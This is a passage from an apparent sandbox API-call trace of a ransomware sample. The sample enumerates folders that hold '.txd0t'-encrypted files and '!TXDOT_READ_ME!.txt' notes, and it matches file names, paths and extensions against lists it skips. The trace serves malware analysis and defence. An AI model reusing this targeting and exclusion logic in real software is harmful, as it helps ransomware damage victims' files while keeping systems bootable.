ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0116.318] StrCmpW (psz1=".", psz2=".") returned 0 [0116.318] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.318] StrCmpW (psz1="..", psz2=".") returned 1 [0116.318] StrCmpW (psz1="..", psz2="..") returned 0 [0116.318] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5881c229, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58868375, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.319] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.319] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.319] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt" [0116.319] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.319] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.319] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.319] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd6b8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.319] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.319] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.319] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t" [0116.319] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.319] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.319] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1404a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.319] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.319] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.319] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0116.319] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.txd0t" [0116.319] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.320] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.320] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.320] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.320] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.320] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0116.320] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0116.320] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" [0116.320] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.320] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.320] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.320] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.320] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.320] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.320] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0116.320] GetProcessHeap () returned 0xe30000 [0116.320] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.320] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0116.320] StrCmpW (psz1="1053", psz2=".") returned 1 [0116.320] StrCmpW (psz1="1053", psz2="..") returned 1 [0116.320] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.320] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.321] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1053", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system32\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\local\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\boot\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\perflogs\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\programdata\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\drivers\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\wsus\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="crypt_detect") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="cryptolocker") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="ransomware") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\WINDOWS") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.321] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files") returned 0x0 [0116.321] GetProcessHeap () returned 0xe30000 [0116.321] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.321] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.321] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\*") returned="C:\\588bce7c90097ed212\\1053\\*" [0116.321] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0116.321] StrCmpW (psz1=".", psz2=".") returned 0 [0116.321] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x589e5c0d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.322] StrCmpW (psz1="..", psz2=".") returned 1 [0116.322] StrCmpW (psz1="..", psz2="..") returned 0 [0116.322] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58868375, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58868375, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5888e589, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.322] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.322] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.322] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.322] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0116.322] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt" [0116.322] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.322] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.322] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.322] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58868375, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1119, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.322] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.322] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.322] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.322] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0116.322] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1053\\eula.rtf.txd0t" [0116.322] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.322] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.322] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x589bf977, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13170, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.322] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.323] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.323] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.323] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0116.323] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t" [0116.323] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.323] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.323] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.323] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.323] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.323] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0116.323] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0116.323] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" [0116.323] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.323] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.323] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.323] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.323] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.323] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.323] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0116.323] GetProcessHeap () returned 0xe30000 [0116.323] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.324] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, 